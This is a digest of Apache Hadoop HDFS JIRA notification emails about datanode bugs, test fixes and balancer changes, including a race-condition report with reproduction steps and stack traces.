[jira] [Commented] (HDFS-6804) race condition between transferring block and appending block causes "Unexpected checksum mismatch exception"

2014-07-31 Thread Gordon Wang (JIRA)

[ 
https://issues.apache.org/jira/browse/HDFS-6804?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=14081972#comment-14081972
 ] 

Gordon Wang commented on HDFS-6804:
---

Some thoughts about how to fix this issue. In my mind, there are 2 ways to fix 
this.
* Option1
When the block is opened for appending, check if there are some DataTransfer 
threads which are transferring block to other DNs. Stop these DataTransferring 
threads. 
We can stop these threads because the generation timestamp of the block is 
increased because it is opened for appending. So, the DataTransfer threads are 
sending outdated blocks. 

* Option2
In DataTransfer thread, if the replica of the block is finalized, the 
DataTransfer thread can read the last data chunk checksum into the memory, 
record the replica length in memory too. Then, when sending the last data 
chunk,  use the checksum in memory instead of reading it from the disk. 
This is similar to what we deal with a RBW replica in DataTransfer.

For Option1, it is hard to stop the DataTransfer thread unless we add some code 
in DataNode to manage DataTransfer threads.
For Option2, we should lock FsDatasetImpl object in DataNode when reading the 
last chunk checksum from disk. Otherwise, the last block might be overwritten. 
But reading from the disk needs time, putting the expensive disk IO operations 
during locking FsDatasetImpl might cause some performance downgrade in 
DataNodes.

Any opinions or comments are welcome!
Thanks.

> race condition between transferring block and appending block causes 
> "Unexpected checksum mismatch exception" 
> --
>
> Key: HDFS-6804
> URL: https://issues.apache.org/jira/browse/HDFS-6804
> Project: Hadoop HDFS
>  Issue Type: Bug
>  Components: datanode
>Affects Versions: 2.2.0
>Reporter: Gordon Wang
>
> We found some error log in the datanode. like this
> {noformat}
> 2014-07-22 01:49:51,338 INFO org.apache.hadoop.hdfs.server.datanode.DataNode: 
> Ex
> ception for BP-2072804351-192.168.2.104-1406008383435:blk_1073741997_9248
> java.io.IOException: Terminating due to a checksum error.java.io.IOException: 
> Unexpected checksum mismatch while writing 
> BP-2072804351-192.168.2.104-1406008383435:blk_1073741997_9248 from 
> /192.168.2.101:39495
> at 
> org.apache.hadoop.hdfs.server.datanode.BlockReceiver.receivePacket(BlockReceiver.java:536)
> at 
> org.apache.hadoop.hdfs.server.datanode.BlockReceiver.receiveBlock(BlockReceiver.java:703)
> at 
> org.apache.hadoop.hdfs.server.datanode.DataXceiver.writeBlock(DataXceiver.java:575)
> at 
> org.apache.hadoop.hdfs.protocol.datatransfer.Receiver.opWriteBlock(Receiver.java:115)
> at 
> org.apache.hadoop.hdfs.protocol.datatransfer.Receiver.processOp(Receiver.java:68)
> at 
> org.apache.hadoop.hdfs.server.datanode.DataXceiver.run(DataXceiver.java:221)
> at java.lang.Thread.run(Thread.java:744)
> {noformat}
> While on the source datanode, the log says the block is transmitted.
> {noformat}
> 2014-07-22 01:49:50,805 INFO org.apache.hadoop.hdfs.server.datanode.DataNode: 
> Da
> taTransfer: Transmitted 
> BP-2072804351-192.168.2.104-1406008383435:blk_1073741997
> _9248 (numBytes=16188152) to /192.168.2.103:50010
> {noformat}
> When the destination datanode gets the checksum mismatch, it reports bad 
> block to NameNode and NameNode marks the replica on the source datanode as 
> corrupt. But actually, the replica on the source datanode is valid. Because 
> the replica can pass the checksum verification.
> In all, the replica on the source data is wrongly marked as corrupted.



--
This message was sent by Atlassian JIRA
(v6.2#6252)


[jira] [Commented] (HDFS-6773) MiniDFSCluster can run dramatically faster

2014-07-31 Thread Stephen Chu (JIRA)

[ 
https://issues.apache.org/jira/browse/HDFS-6773?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=14081959#comment-14081959
 ] 

Stephen Chu commented on HDFS-6773:
---

Thanks, Daryn. That sounds like a good approach.

I see 2 tests that 
{{EditLogFileOutputStream.setShouldSkipFsyncForTesting(false);}}:
TestFsDatasetCache.java
TestCacheDirectives.java

Checked with Andrew and Colin, and we think that fsync is probably not a 
requirement for the caching tests because the unit tests aren't aimed to be run 
with a power-cycle in between. Will look into it more, as well as go through 
the rest of HDFS tests to see if any need fsync.

> MiniDFSCluster can run dramatically faster
> --
>
> Key: HDFS-6773
> URL: https://issues.apache.org/jira/browse/HDFS-6773
> Project: Hadoop HDFS
>  Issue Type: Improvement
>  Components: namenode
>Affects Versions: 2.0.0-alpha, 3.0.0
>Reporter: Daryn Sharp
>Assignee: Stephen Chu
>
> The mini cluster is unnecessarily running with durable edit logs.  The 
> following change cut runtime of a single test from ~30s to ~10s.
> {code}EditLogFileOutputStream.setShouldSkipFsyncForTesting(true);{code}
> The mini cluster should default to this behavior after identifying the few 
> edit log tests that probably depend on durable logs.



--
This message was sent by Atlassian JIRA
(v6.2#6252)


[jira] [Commented] (HDFS-6804) race condition between transferring block and appending block causes "Unexpected checksum mismatch exception"

2014-07-31 Thread Gordon Wang (JIRA)

[ 
https://issues.apache.org/jira/browse/HDFS-6804?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=14081955#comment-14081955
 ] 

Gordon Wang commented on HDFS-6804:
---

After checking the code of Datanode block transferring, I found some race 
condition during transferring the block to the other datanode. And the race 
condition causes the source datanode transfers the wrong checksum of the last 
chunk in replica.

Here is the root cause.
# Datanode DN1 receives transfer block command from NameNode, say, the command 
needs DN1 to transfer block B1 to DataNode DN2.
# DN1 creates a new DataTransfer thread, which is responsible for transferring 
B1 to DN2.
# When DataTransfer thread is created, the replica of B1 is in Finalized state. 
Then, DataTransfer reads replica content and checksum directly from disk, sends 
them to DN2.
# During DataTransfer is sending data to DN2. The block B1 is opened for 
appending. If the last data chunk of B1 is not full, the last checksum will be 
overwritten by the BlockReceiver thread.
# In DataTransfer thread, it records the block length as the length before 
appending. Then, here comes the problem. When DataTransfer thread sends the 
last data chunk to ND2, it reads the checksum of the last chunk from the disk 
and sends the checksum too. But at this time, the last checksum is changed, 
because some more data is appended in the last data chunk.
# When DN2 receives the last data chunk and checksum, it will throw the 
checksum mismatch exception.

The reproduce steps
Prerequisites
# change the code in DataNode.java, sleep a while before sending the block. 
Make these change in DataTransfer.run method.
{code}
//hack code here
try {
  LOG.warn("sleep 10 seconds before transfer the block:" + b);
  Thread.sleep(1000L * 10);
}catch (InterruptedException ie) {
  LOG.error("exception caught.");
}
//hack code end

// send data & checksum
blockSender.sendBlock(out, unbufOut, null);
{code}

Steps
# Create a HDFS cluster which has 1 NameNode NN and 1 DataNode DN1.
# Create a file F1 whose expected replica factor is 3. Writes some data to the 
file and close it.
# start a new DataNode DN2 to join the cluster.
# grep the log of DN1, when the DataTransfer thread is sleeping, open F1 to 
appends some data, hflush the data to the DN1.

Then, you can find that DN2 throws checksum mismatch exception when receiving 
the last block of file F1.

> race condition between transferring block and appending block causes 
> "Unexpected checksum mismatch exception" 
> --
>
> Key: HDFS-6804
> URL: https://issues.apache.org/jira/browse/HDFS-6804
> Project: Hadoop HDFS
>  Issue Type: Bug
>  Components: datanode
>Affects Versions: 2.2.0
>Reporter: Gordon Wang
>
> We found some error log in the datanode. like this
> {noformat}
> 2014-07-22 01:49:51,338 INFO org.apache.hadoop.hdfs.server.datanode.DataNode: 
> Ex
> ception for BP-2072804351-192.168.2.104-1406008383435:blk_1073741997_9248
> java.io.IOException: Terminating due to a checksum error.java.io.IOException: 
> Unexpected checksum mismatch while writing 
> BP-2072804351-192.168.2.104-1406008383435:blk_1073741997_9248 from 
> /192.168.2.101:39495
> at 
> org.apache.hadoop.hdfs.server.datanode.BlockReceiver.receivePacket(BlockReceiver.java:536)
> at 
> org.apache.hadoop.hdfs.server.datanode.BlockReceiver.receiveBlock(BlockReceiver.java:703)
> at 
> org.apache.hadoop.hdfs.server.datanode.DataXceiver.writeBlock(DataXceiver.java:575)
> at 
> org.apache.hadoop.hdfs.protocol.datatransfer.Receiver.opWriteBlock(Receiver.java:115)
> at 
> org.apache.hadoop.hdfs.protocol.datatransfer.Receiver.processOp(Receiver.java:68)
> at 
> org.apache.hadoop.hdfs.server.datanode.DataXceiver.run(DataXceiver.java:221)
> at java.lang.Thread.run(Thread.java:744)
> {noformat}
> While on the source datanode, the log says the block is transmitted.
> {noformat}
> 2014-07-22 01:49:50,805 INFO org.apache.hadoop.hdfs.server.datanode.DataNode: 
> Da
> taTransfer: Transmitted 
> BP-2072804351-192.168.2.104-1406008383435:blk_1073741997
> _9248 (numBytes=16188152) to /192.168.2.103:50010
> {noformat}
> When the destination datanode gets the checksum mismatch, it reports bad 
> block to NameNode and NameNode marks the replica on the source datanode as 
> corrupt. But actually, the replica on the source datanode is valid. Because 
> the replica can pass the checksum verification.
> In all, the replica on the source data is wrongly marked as corrupted.



--
This message was sent by Atlassian JIRA
(v6.2#6252)


[jira] [Created] (HDFS-6804) race condition between transferring block and appending block causes "Unexpected checksum mismatch exception"

2014-07-31 Thread Gordon Wang (JIRA)
Gordon Wang created HDFS-6804:
-

 Summary: race condition between transferring block and appending 
block causes "Unexpected checksum mismatch exception" 
 Key: HDFS-6804
 URL: https://issues.apache.org/jira/browse/HDFS-6804
 Project: Hadoop HDFS
  Issue Type: Bug
  Components: datanode
Affects Versions: 2.2.0
Reporter: Gordon Wang


We found some error log in the datanode. like this
{noformat}
2014-07-22 01:49:51,338 INFO org.apache.hadoop.hdfs.server.datanode.DataNode: Ex
ception for BP-2072804351-192.168.2.104-1406008383435:blk_1073741997_9248
java.io.IOException: Terminating due to a checksum error.java.io.IOException: 
Unexpected checksum mismatch while writing 
BP-2072804351-192.168.2.104-1406008383435:blk_1073741997_9248 from 
/192.168.2.101:39495
at 
org.apache.hadoop.hdfs.server.datanode.BlockReceiver.receivePacket(BlockReceiver.java:536)
at 
org.apache.hadoop.hdfs.server.datanode.BlockReceiver.receiveBlock(BlockReceiver.java:703)
at 
org.apache.hadoop.hdfs.server.datanode.DataXceiver.writeBlock(DataXceiver.java:575)
at 
org.apache.hadoop.hdfs.protocol.datatransfer.Receiver.opWriteBlock(Receiver.java:115)
at 
org.apache.hadoop.hdfs.protocol.datatransfer.Receiver.processOp(Receiver.java:68)
at 
org.apache.hadoop.hdfs.server.datanode.DataXceiver.run(DataXceiver.java:221)
at java.lang.Thread.run(Thread.java:744)
{noformat}
While on the source datanode, the log says the block is transmitted.
{noformat}
2014-07-22 01:49:50,805 INFO org.apache.hadoop.hdfs.server.datanode.DataNode: Da
taTransfer: Transmitted BP-2072804351-192.168.2.104-1406008383435:blk_1073741997
_9248 (numBytes=16188152) to /192.168.2.103:50010
{noformat}

When the destination datanode gets the checksum mismatch, it reports bad block 
to NameNode and NameNode marks the replica on the source datanode as corrupt. 
But actually, the replica on the source datanode is valid. Because the replica 
can pass the checksum verification.

In all, the replica on the source data is wrongly marked as corrupted.



--
This message was sent by Atlassian JIRA
(v6.2#6252)


[jira] [Commented] (HDFS-6802) Some tests in TestDFSClientFailover are missing @Test annotation

2014-07-31 Thread Akira AJISAKA (JIRA)

[ 
https://issues.apache.org/jira/browse/HDFS-6802?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=14081921#comment-14081921
 ] 

Akira AJISAKA commented on HDFS-6802:
-

Attached a patch to
# add {{@Test}} annotation
# fix {{testWrappedFailoverProxyProvider()}} failure by setting 
{{SecurityUtil}} not to use IP address for token service. 

> Some tests in TestDFSClientFailover are missing @Test annotation
> 
>
> Key: HDFS-6802
> URL: https://issues.apache.org/jira/browse/HDFS-6802
> Project: Hadoop HDFS
>  Issue Type: Bug
>  Components: test
>Affects Versions: 2.5.0
>Reporter: Akira AJISAKA
>  Labels: newbie
> Attachments: HDFS-6802.patch
>
>
> HDFS-6334 added new tests in TestDFSClientFailover but they are not executed 
> by Junit framework because they don't have {{@Test}} annotation.



--
This message was sent by Atlassian JIRA
(v6.2#6252)


[jira] [Updated] (HDFS-6802) Some tests in TestDFSClientFailover are missing @Test annotation

2014-07-31 Thread Akira AJISAKA (JIRA)

 [ 
https://issues.apache.org/jira/browse/HDFS-6802?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Akira AJISAKA updated HDFS-6802:


Assignee: Akira AJISAKA
Target Version/s: 2.5.0
  Status: Patch Available  (was: Open)

> Some tests in TestDFSClientFailover are missing @Test annotation
> 
>
> Key: HDFS-6802
> URL: https://issues.apache.org/jira/browse/HDFS-6802
> Project: Hadoop HDFS
>  Issue Type: Bug
>  Components: test
>Affects Versions: 2.5.0
>Reporter: Akira AJISAKA
>Assignee: Akira AJISAKA
>  Labels: newbie
> Attachments: HDFS-6802.patch
>
>
> HDFS-6334 added new tests in TestDFSClientFailover but they are not executed 
> by Junit framework because they don't have {{@Test}} annotation.



--
This message was sent by Atlassian JIRA
(v6.2#6252)


[jira] [Updated] (HDFS-6802) Some tests in TestDFSClientFailover are missing @Test annotation

2014-07-31 Thread Akira AJISAKA (JIRA)

 [ 
https://issues.apache.org/jira/browse/HDFS-6802?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Akira AJISAKA updated HDFS-6802:


Attachment: HDFS-6802.patch

> Some tests in TestDFSClientFailover are missing @Test annotation
> 
>
> Key: HDFS-6802
> URL: https://issues.apache.org/jira/browse/HDFS-6802
> Project: Hadoop HDFS
>  Issue Type: Bug
>  Components: test
>Affects Versions: 2.5.0
>Reporter: Akira AJISAKA
>  Labels: newbie
> Attachments: HDFS-6802.patch
>
>
> HDFS-6334 added new tests in TestDFSClientFailover but they are not executed 
> by Junit framework because they don't have {{@Test}} annotation.



--
This message was sent by Atlassian JIRA
(v6.2#6252)


[jira] [Created] (HDFS-6803) Documenting DFSClient#DFSInputStream expectations reading and preading in concurrent context

2014-07-31 Thread stack (JIRA)
stack created HDFS-6803:
---

 Summary: Documenting DFSClient#DFSInputStream expectations reading 
and preading in concurrent context
 Key: HDFS-6803
 URL: https://issues.apache.org/jira/browse/HDFS-6803
 Project: Hadoop HDFS
  Issue Type: Sub-task
  Components: hdfs-client
Affects Versions: 2.4.1
Reporter: stack
 Attachments: DocumentingDFSClientDFSInputStream (1).pdf

Reviews of the patch posted the parent task suggest that we be more explicit 
about how DFSIS is expected to behave when being read by contending threads. It 
is also suggested that presumptions made internally be made explicit 
documenting expectations.

Before we put up a patch we've made a document of assertions we'd like to make 
into tenets of DFSInputSteam.  If agreement, we'll attach to this issue a patch 
that weaves the assumptions into DFSIS as javadoc and class comments. 





--
This message was sent by Atlassian JIRA
(v6.2#6252)


[jira] [Updated] (HDFS-6803) Documenting DFSClient#DFSInputStream expectations reading and preading in concurrent context

2014-07-31 Thread stack (JIRA)

 [ 
https://issues.apache.org/jira/browse/HDFS-6803?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

stack updated HDFS-6803:


Attachment: DocumentingDFSClientDFSInputStream (1).pdf

First cut.  Please review and advise if we overstep.  Thanks.

> Documenting DFSClient#DFSInputStream expectations reading and preading in 
> concurrent context
> 
>
> Key: HDFS-6803
> URL: https://issues.apache.org/jira/browse/HDFS-6803
> Project: Hadoop HDFS
>  Issue Type: Sub-task
>  Components: hdfs-client
>Affects Versions: 2.4.1
>Reporter: stack
> Attachments: DocumentingDFSClientDFSInputStream (1).pdf
>
>
> Reviews of the patch posted the parent task suggest that we be more explicit 
> about how DFSIS is expected to behave when being read by contending threads. 
> It is also suggested that presumptions made internally be made explicit 
> documenting expectations.
> Before we put up a patch we've made a document of assertions we'd like to 
> make into tenets of DFSInputSteam.  If agreement, we'll attach to this issue 
> a patch that weaves the assumptions into DFSIS as javadoc and class comments. 



--
This message was sent by Atlassian JIRA
(v6.2#6252)


[jira] [Commented] (HDFS-6798) Add test case for incorrect data node condition during balancing

2014-07-31 Thread Hadoop QA (JIRA)

[ 
https://issues.apache.org/jira/browse/HDFS-6798?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=14081909#comment-14081909
 ] 

Hadoop QA commented on HDFS-6798:
-

{color:green}+1 overall{color}.  Here are the results of testing the latest 
attachment 
  http://issues.apache.org/jira/secure/attachment/12659010/HDFS-6798.patch
  against trunk revision .

{color:green}+1 @author{color}.  The patch does not contain any @author 
tags.

{color:green}+1 tests included{color}.  The patch appears to include 1 new 
or modified test files.

{color:green}+1 javac{color}.  The applied patch does not increase the 
total number of javac compiler warnings.

{color:green}+1 javadoc{color}.  There were no new javadoc warning messages.

{color:green}+1 eclipse:eclipse{color}.  The patch built with 
eclipse:eclipse.

{color:green}+1 findbugs{color}.  The patch does not introduce any new 
Findbugs (version 2.0.3) warnings.

{color:green}+1 release audit{color}.  The applied patch does not increase 
the total number of release audit warnings.

{color:green}+1 core tests{color}.  The patch passed unit tests in 
hadoop-hdfs-project/hadoop-hdfs.

{color:green}+1 contrib tests{color}.  The patch passed contrib unit tests.

Test results: 
https://builds.apache.org/job/PreCommit-HDFS-Build/7522//testReport/
Console output: https://builds.apache.org/job/PreCommit-HDFS-Build/7522//console

This message is automatically generated.

> Add test case for incorrect data node condition during balancing
> 
>
> Key: HDFS-6798
> URL: https://issues.apache.org/jira/browse/HDFS-6798
> Project: Hadoop HDFS
>  Issue Type: Improvement
>  Components: balancer
>Affects Versions: 2.4.1
>Reporter: Benoy Antony
>Assignee: Benoy Antony
> Attachments: HDFS-6798.patch
>
>
> The Balancer makes a check to see if a block's location is a known data node. 
> But the variable it uses to check is wrong. This issue was fixed in HDFS-6364.
> There was no way to easily unit test it at that time. Since HDFS-6441 enables 
> one to simulate this case, it was decided to add the unit test once HDFS-6441 
> is resolved.



--
This message was sent by Atlassian JIRA
(v6.2#6252)


[jira] [Commented] (HDFS-3482) hdfs balancer throws ArrayIndexOutOfBoundsException if option is specified without arguments

2014-07-31 Thread Hudson (JIRA)

[ 
https://issues.apache.org/jira/browse/HDFS-3482?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=14081902#comment-14081902
 ] 

Hudson commented on HDFS-3482:
--

SUCCESS: Integrated in Hadoop-trunk-Commit #5993 (See 
[https://builds.apache.org/job/Hadoop-trunk-Commit/5993/])
HDFS-3482. Update CHANGES.txt. (arp: 
http://svn.apache.org/viewcvs.cgi/?root=Apache-SVN&view=rev&rev=1615019)
* /hadoop/common/trunk/hadoop-hdfs-project/hadoop-hdfs/CHANGES.txt


> hdfs balancer throws ArrayIndexOutOfBoundsException if option is specified 
> without arguments
> 
>
> Key: HDFS-3482
> URL: https://issues.apache.org/jira/browse/HDFS-3482
> Project: Hadoop HDFS
>  Issue Type: Bug
>  Components: balancer
>Affects Versions: 2.0.0-alpha
>Reporter: Stephen Chu
>Assignee: madhukara phatak
>Priority: Minor
>  Labels: newbie
> Fix For: 3.0.0, 2.6.0
>
> Attachments: HDFS-3482-1.patch, HDFS-3482-2.patch, HDFS-3482-3.patch, 
> HDFS-3482-4.patch, HDFS-3482-4.patch, HDFS-3482.patch
>
>
> When running the hdfs balancer with an option but no argument, we run into an 
> ArrayIndexOutOfBoundsException. It's preferable to print the usage.
> {noformat}
> bash-3.2$ hdfs balancer -threshold
> Usage: java Balancer
> [-policy ]the balancing policy: datanode or blockpool
> [-threshold ]  Percentage of disk capacity
> Balancing took 261.0 milliseconds
> 12/05/31 09:38:46 ERROR balancer.Balancer: Exiting balancer due an exception
> java.lang.ArrayIndexOutOfBoundsException: 1
>   at 
> org.apache.hadoop.hdfs.server.balancer.Balancer$Cli.parse(Balancer.java:1505)
>   at 
> org.apache.hadoop.hdfs.server.balancer.Balancer$Cli.run(Balancer.java:1482)
>   at org.apache.hadoop.util.ToolRunner.run(ToolRunner.java:70)
>   at 
> org.apache.hadoop.hdfs.server.balancer.Balancer.main(Balancer.java:1555)
> bash-3.2$ hdfs balancer -policy
> Usage: java Balancer
> [-policy ]the balancing policy: datanode or blockpool
> [-threshold ]  Percentage of disk capacity
> Balancing took 261.0 milliseconds
> 12/05/31 09:39:03 ERROR balancer.Balancer: Exiting balancer due an exception
> java.lang.ArrayIndexOutOfBoundsException: 1
>   at 
> org.apache.hadoop.hdfs.server.balancer.Balancer$Cli.parse(Balancer.java:1520)
>   at 
> org.apache.hadoop.hdfs.server.balancer.Balancer$Cli.run(Balancer.java:1482)
>   at org.apache.hadoop.util.ToolRunner.run(ToolRunner.java:70)
>   at 
> org.apache.hadoop.hdfs.server.balancer.Balancer.main(Balancer.java:1555)
> {noformat}



--
This message was sent by Atlassian JIRA
(v6.2#6252)


[jira] [Commented] (HDFS-6685) Balancer should preserve storage type of replicas

2014-07-31 Thread Hudson (JIRA)

[ 
https://issues.apache.org/jira/browse/HDFS-6685?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=14081900#comment-14081900
 ] 

Hudson commented on HDFS-6685:
--

SUCCESS: Integrated in Hadoop-trunk-Commit #5993 (See 
[https://builds.apache.org/job/Hadoop-trunk-Commit/5993/])
HDFS-6685. Balancer should preserve storage type of replicas. (szetszwo: 
http://svn.apache.org/viewcvs.cgi/?root=Apache-SVN&view=rev&rev=1615015)
* /hadoop/common/trunk/hadoop-hdfs-project/hadoop-hdfs/CHANGES.txt
* 
/hadoop/common/trunk/hadoop-hdfs-project/hadoop-hdfs/src/main/java/org/apache/hadoop/hdfs/StorageType.java
* 
/hadoop/common/trunk/hadoop-hdfs-project/hadoop-hdfs/src/main/java/org/apache/hadoop/hdfs/protocolPB/PBHelper.java
* 
/hadoop/common/trunk/hadoop-hdfs-project/hadoop-hdfs/src/main/java/org/apache/hadoop/hdfs/server/balancer/Balancer.java
* 
/hadoop/common/trunk/hadoop-hdfs-project/hadoop-hdfs/src/main/java/org/apache/hadoop/hdfs/server/balancer/BalancingPolicy.java
* 
/hadoop/common/trunk/hadoop-hdfs-project/hadoop-hdfs/src/main/java/org/apache/hadoop/hdfs/server/blockmanagement/BlockManager.java
* 
/hadoop/common/trunk/hadoop-hdfs-project/hadoop-hdfs/src/main/java/org/apache/hadoop/hdfs/server/protocol/BlocksWithLocations.java
* 
/hadoop/common/trunk/hadoop-hdfs-project/hadoop-hdfs/src/main/java/org/apache/hadoop/hdfs/util/EnumCounters.java
* 
/hadoop/common/trunk/hadoop-hdfs-project/hadoop-hdfs/src/main/java/org/apache/hadoop/hdfs/util/EnumDoubles.java
* /hadoop/common/trunk/hadoop-hdfs-project/hadoop-hdfs/src/main/proto/hdfs.proto
* 
/hadoop/common/trunk/hadoop-hdfs-project/hadoop-hdfs/src/test/java/org/apache/hadoop/hdfs/protocolPB/TestPBHelper.java


> Balancer should preserve storage type of replicas
> -
>
> Key: HDFS-6685
> URL: https://issues.apache.org/jira/browse/HDFS-6685
> Project: Hadoop HDFS
>  Issue Type: Improvement
>  Components: balancer
>Reporter: Tsz Wo Nicholas Sze
>Assignee: Tsz Wo Nicholas Sze
> Fix For: 2.6.0
>
> Attachments: h6685_20140728.patch, h6685_20140729.patch, 
> h6685_20140730.patch, h6685_20140730b.patch, h6685_20140731.patch
>
>
> When Balancer moves replicas to balance the cluster, it should always move 
> replicas from a storage with any type to another storage with the same type, 
> i.e. it preserves storage type of replicas.  It does not make sense to move 
> replicas to a different storage type.



--
This message was sent by Atlassian JIRA
(v6.2#6252)


[jira] [Commented] (HDFS-6797) DataNode logs wrong layoutversion during upgrade

2014-07-31 Thread Hudson (JIRA)

[ 
https://issues.apache.org/jira/browse/HDFS-6797?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=14081901#comment-14081901
 ] 

Hudson commented on HDFS-6797:
--

SUCCESS: Integrated in Hadoop-trunk-Commit #5993 (See 
[https://builds.apache.org/job/Hadoop-trunk-Commit/5993/])
HDFS-6797. DataNode logs wrong layoutversion during upgrade. (Contributed by 
Benoy Antony) (arp: 
http://svn.apache.org/viewcvs.cgi/?root=Apache-SVN&view=rev&rev=1615017)
* /hadoop/common/trunk/hadoop-hdfs-project/hadoop-hdfs/CHANGES.txt
* 
/hadoop/common/trunk/hadoop-hdfs-project/hadoop-hdfs/src/main/java/org/apache/hadoop/hdfs/server/datanode/BlockPoolSliceStorage.java


> DataNode logs wrong layoutversion during upgrade
> 
>
> Key: HDFS-6797
> URL: https://issues.apache.org/jira/browse/HDFS-6797
> Project: Hadoop HDFS
>  Issue Type: Bug
>  Components: datanode
>Affects Versions: 2.4.1
>Reporter: Benoy Antony
>Assignee: Benoy Antony
> Fix For: 3.0.0, 2.6.0
>
> Attachments: HDFS-6797.patch
>
>
> Before upgrade, data node version was -55. The new data node version remained 
> at -55. During upgrade we got he following messages:
> {code}
> 2014-07-15 12:59:55,253 INFO org.apache.hadoop.hdfs.server.common.Storage: 
> Data-node version: -55 and name-node layout version: -56
> ...
> ...
> ...
> ...
> 2014-07-15 12:59:56,479 INFO org.apache.hadoop.hdfs.server.common.Storage: 
> Upgrading block pool storage directory 
> /hadoop/1/data1/current/BP-825373266-xx.xxx.xxx.xx-1379095203239.
>old LV = -55; old CTime = 1402508907789.
>new LV = -56; new CTime = 1405453914270
> 2014-07-15 13:00:07,697 INFO org.apache.hadoop.hdfs.server.common.Storage: 
> Upgrade of block pool BP-825373266-xx.xxx.xxx.xx-1379095203239 at 
> /hadoop/12/data1/current/BP-825373266-xx.xxx.xxx.xx-1379095203239 is complete
> 2014-07-15 13:00:07,839 INFO org.apache.hadoop.hdfs.server.datanode.DataNode: 
> Setting up storage: 
> nsid=859725752;bpid=BP-825373266-xx.xxx.xxx.xx-1379095203239;lv=-55;nsInfo=lv=-56;cid=CID-303ee504-e03c-4a5e-bc59-2b275b308152;nsid=859725752;c=1405453914270;bpid=BP-82537326
> 6-xx.xxx.xxx.xx-1379095203239;dnuuid=b1011b87-d7cd-48ce-92cc-f7cca0e8cbae
> {code}
> after upgrade completing, restart of DN still shows message regarding version 
> difference:
> {code}
> INFO org.apache.hadoop.hdfs.server.common.Storage: Data-node version: -55 and 
> name-node layout version: -56
> {code}
> This causes confusion to the operators as if upgrade did not succeed since 
> data node's layout version is not updated to the "new LV" value
> Actually name node's layout version is displayed as the "new LV" value.
> Since the data node and name node layout versions are separate now, the new 
> data node layout version should be shown as the “new LV”.  
> Thanks to [~ehf] who found and reported this issue.



--
This message was sent by Atlassian JIRA
(v6.2#6252)


[jira] [Updated] (HDFS-5185) DN fails to startup if one of the data dir is full

2014-07-31 Thread Vinayakumar B (JIRA)

 [ 
https://issues.apache.org/jira/browse/HDFS-5185?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Vinayakumar B updated HDFS-5185:


Attachment: HDFS-5185-002.patch

Attaching the updated patch.
after recent changes {{checkDiskError()}}  will trigger one periodic thread 
which will check for disk error asynchronously. But this issue requires 
synchronous check for errors before initializing block pools.
Accordingly, checking for errors synchronously before initializing block pools 
to exclude failed disks to avoid startup failures.

Please review.

> DN fails to startup if one of the data dir is full
> --
>
> Key: HDFS-5185
> URL: https://issues.apache.org/jira/browse/HDFS-5185
> Project: Hadoop HDFS
>  Issue Type: Bug
>  Components: datanode
>Reporter: Vinayakumar B
>Assignee: Vinayakumar B
>Priority: Critical
> Attachments: HDFS-5185-002.patch, HDFS-5185.patch
>
>
> DataNode fails to startup if one of the data dirs configured is out of space. 
> fails with following exception
> {noformat}2013-09-11 17:48:43,680 FATAL 
> org.apache.hadoop.hdfs.server.datanode.DataNode: Initialization failed for 
> block pool Block pool  (storage id 
> DS-308316523-xx.xx.xx.xx-64015-1378896293604) service to /nn1:65110
> java.io.IOException: Mkdirs failed to create 
> /opt/nish/data/current/BP-123456-1234567/tmp
> at 
> org.apache.hadoop.hdfs.server.datanode.fsdataset.impl.BlockPoolSlice.(BlockPoolSlice.java:105)
> at 
> org.apache.hadoop.hdfs.server.datanode.fsdataset.impl.FsVolumeImpl.addBlockPool(FsVolumeImpl.java:216)
> at 
> org.apache.hadoop.hdfs.server.datanode.fsdataset.impl.FsVolumeList.addBlockPool(FsVolumeList.java:155)
> at 
> org.apache.hadoop.hdfs.server.datanode.fsdataset.impl.FsDatasetImpl.addBlockPool(FsDatasetImpl.java:1593)
> at 
> org.apache.hadoop.hdfs.server.datanode.DataNode.initBlockPool(DataNode.java:834)
> at 
> org.apache.hadoop.hdfs.server.datanode.BPOfferService.verifyAndSetNamespaceInfo(BPOfferService.java:311)
> at 
> org.apache.hadoop.hdfs.server.datanode.BPServiceActor.connectToNNAndHandshake(BPServiceActor.java:217)
> at 
> org.apache.hadoop.hdfs.server.datanode.BPServiceActor.run(BPServiceActor.java:660)
> at java.lang.Thread.run(Thread.java:662)
> {noformat}
> It should continue to start-up with other data dirs available.



--
This message was sent by Atlassian JIRA
(v6.2#6252)


[jira] [Created] (HDFS-6802) Some tests in TestDFSClientFailover are missing @Test annotation

2014-07-31 Thread Akira AJISAKA (JIRA)
Akira AJISAKA created HDFS-6802:
---

 Summary: Some tests in TestDFSClientFailover are missing @Test 
annotation
 Key: HDFS-6802
 URL: https://issues.apache.org/jira/browse/HDFS-6802
 Project: Hadoop HDFS
  Issue Type: Bug
  Components: test
Affects Versions: 2.5.0
Reporter: Akira AJISAKA


HDFS-6334 added new tests in TestDFSClientFailover but they are not executed by 
Junit framework because they don't have {{@Test}} annotation.



--
This message was sent by Atlassian JIRA
(v6.2#6252)


[jira] [Commented] (HDFS-5185) DN fails to startup if one of the data dir is full

2014-07-31 Thread Hadoop QA (JIRA)

[ 
https://issues.apache.org/jira/browse/HDFS-5185?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=14081885#comment-14081885
 ] 

Hadoop QA commented on HDFS-5185:
-

{color:red}-1 overall{color}.  Here are the results of testing the latest 
attachment 
  http://issues.apache.org/jira/secure/attachment/12627603/HDFS-5185.patch
  against trunk revision .

{color:green}+1 @author{color}.  The patch does not contain any @author 
tags.

{color:red}-1 tests included{color}.  The patch doesn't appear to include 
any new or modified tests.
Please justify why no new tests are needed for this 
patch.
Also please list what manual steps were performed to 
verify this patch.

